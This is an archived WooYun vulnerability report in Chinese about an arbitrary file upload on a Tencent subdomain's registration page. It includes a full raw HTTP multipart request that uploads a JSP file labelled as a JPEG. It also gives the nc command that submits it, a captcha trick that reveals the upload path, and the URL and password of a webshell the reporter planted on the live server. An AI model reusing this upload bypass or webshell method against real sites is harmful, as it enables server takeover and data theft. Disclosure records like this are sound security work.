漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-07463
漏洞标题:腾讯某分站任意文件上传漏洞
相关厂商:腾讯
漏洞作者: Jannock
提交时间:2012-05-23 20:06
修复时间:2012-07-07 20:07
公开时间:2012-07-07 20:07
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-05-23: 细节已通知厂商并且等待厂商处理中
2012-05-23: 厂商已经确认,细节仅向厂商公开
2012-06-02: 细节向核心白帽子及相关领域专家公开
2012-06-12: 细节向普通白帽子公开
2012-06-22: 细节向实习白帽子公开
2012-07-07: 细节向公众公开
简要描述:
腾讯某分站任意文件上传漏洞,可导致拿shell
详细说明:
http://tap.3g.qq.com:8080/mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg
注册页面。
身份证扫描件 处上传,可直接上传任意文件。记得验证码处要乱填,这样才会返回上传后的地址。
下面是nc提交
POST /mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg HTTP/1.1
Host: tap.3g.qq.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Connection: keep-alive
Referer: http://tap.3g.qq.com:8080/mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg
Cookie: JSESSIONID=ft7AHd82i0g7rMg5Dt
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 2679
-----------------------------24464570528145
Content-Disposition: form-data; name="MVC_BUS"
CPRegister
-----------------------------24464570528145
Content-Disposition: form-data; name="MVC_ACTION"
NocpReg
-----------------------------24464570528145
Content-Disposition: form-data; name="agreeProtocol"
yes
-----------------------------24464570528145
Content-Disposition: form-data; name="codevalid"
-----------------------------24464570528145
Content-Disposition: form-data; name="isEdit"
false
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_username"
aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="newpwd"
111111
-----------------------------24464570528145
Content-Disposition: form-data; name="newpwd_again"
111111
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_name"
aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_person"
aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_mobilephone"
13800138001
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contacttel1"
333-3-55555555
-----------------------------24464570528145
Content-Disposition: form-data; name="province"
2
-----------------------------24464570528145
Content-Disposition: form-data; name="city"
2
-----------------------------24464570528145
Content-Disposition: form-data; name="area"
21
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_qq"
16104383133
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_email"
16104383133@qq.com
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_identitycode"
610722197909188715
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_cert_image"; filename="watermarkpreview.jsp"
Content-Type: image/jpeg
xxxxxx
-----------------------------24464570528145
Content-Disposition: form-data; name="cert_image"
http://tap.3g.qq.com:8080/certs/6513B59E371497A2FCAF47E6EC495666.jpg
-----------------------------24464570528145
Content-Disposition: form-data; name="code"
qmqj
-----------------------------24464570528145
Content-Disposition: form-data; name="codesid"
4TTWIX8F53WF3MOISJ7WDHXONNYYYGUU
-----------------------------24464570528145
Content-Disposition: form-data; name="randomSeed"
1115945018
-----------------------------24464570528145--
注意到
cp_cert_image 字段哦。
nc tap.3g.qq.com 8080<1.txt
查看返回即可以找到上传后的文件路径。
http://tap.3g.qq.com:8080/certs/9AFF900FA65CF142E0506EBFC87A23D3.jsp
随便网上找的一个马,密码是:jspspy
你们删除吧!
漏洞证明:
修复方案:
应该懂得!
版权声明:转载请注明来源 Jannock@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2012-05-23 20:47
厂商回复:
非常感谢您的报告,我们已在紧急处理此问题。
最新状态:
暂无